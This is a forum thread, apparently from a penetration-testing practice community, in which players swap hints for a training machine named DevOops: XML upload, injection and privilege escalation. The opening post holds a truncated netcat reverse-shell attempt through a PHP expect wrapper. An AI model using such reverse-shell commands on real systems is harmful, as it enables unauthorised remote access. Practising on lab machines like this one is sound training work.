Dev0ops hints

expect://nc -c '/bin/bash 10.10.. 4444

why nothing works?

@waspy You can’t do remote code execution on this box. From my understanding the server needs some sort of php module for that.

If anyone needs a hint I’m here, just completed the box.

Took me a few long brain crunching hours but I finally got root.
I was overthinking so hard that I didn’t see the obvious solution.
Amazing box.
learnt a lot from it.
Would Recommend!!!

Hi
Just need a pointer to get the initial foothold on this box, I think I have done enough enumeration and I’m trying to upload something and getting “Internal Server Error”. Am I on the right track??
Any advice would be greatly received!

@moony8272 said:
Hi
Just need a pointer to get the initial foothold on this box, I think I have done enough enumeration and I’m trying to upload something and getting “Internal Server Error”. Am I on the right track??
Any advice would be greatly received!

Look up the format that is being parsed and read the text on the website. You can PM me if you need another nudge.

Not too hard of a box. Was able to figure out with basic enumeration and then looking through the hints on here. Fun box though!

need help in priv esc. Can anyone a PM?

Anyone who needs help is welcome to PM me.

Already got interesting file but definitely don’t know what to do next. Am I right that I need to send something to the ne***st for user.txt?

@iammainul said:
need help in priv esc. Can anyone a PM?

Shoot me a message, if you still need help.

I’ve gotten quite a few PMs about this box. I’ve also seen a lot of hints that kind of reiterate the same thing over and over so maybe this will help all those who are stuck.

While the path to root isn’t as complicated as it feels if you’ve been digging around for a while, it’s also not quite as obvious I don’t think as everyone states if you’re new to what you need to work with on this box.

Yes, RTFM is quite a thing and I agree. But to hopefully cut down on the cycle of “I’ve read the hints and done the things and can’t see what I’m missing or if I’m on the right track” I’d like to re-contextualize the hint that’s been repetitiously stated into something that may be of more conceptual aid, without adding any new hints or information.

Think about the things you are looking through/need to look through as a blueprint of a building, and the lines you are looking through in those locations as paths in the building or rooms. You need to find the correct path and room you need to be in. Go through things line by line and if you don’t understand what the line is doing, research until you do. This will help you better be able to read the blueprint and to know which path and rooms are important, which are not, and where to find the tools you need to get into the rooms you need to be in.

Happy Hunting

@Didakt said:
Rooted !
Very cool box, thanks to the creator :slight_smile:

And the first hint some one gave for priv esc was just perfect :

“Far far ago, there was a man that could view back into the past, and see alternated versions of realities , how did he do that mate?”

Think about it !

Thanks for the box

Cheers. This gave me the nudge I needed :slight_smile:

rooted! dm me for hints!

finally got root, if someone needs help, just PM me…

After figuring out what I was doing wrong with uploading the xml, I wanted to punch my own face. Basically had the xml formatting correct the whole time but it was the SYNTAX to pay very close attention to combined with the few hints the “developer” left . Hope this doesn’t give away too much, first comment on the forum, 5th “user” I’ve gotten. I think I know where to go with root now. Time to find out. Thanks for the hints to everyone as well. They were exactly what I needed to know I was on the right track, without giving away too much and taking away from the learning experience.

hopelessly stuck on devoops, I know the method is similar to aragog but i cant find the proper syntax to inject or where to inject it please help

Okay, Ive found a very interesting page, havin a little trouble formatting the peanut butter for my sandwich, pm me if you can help pls

@Monkey23 the owasp top 10 gives you it on a plate

If I put it into the form on the page in file form it comes up in burp all red…do I have to move it outside the number string?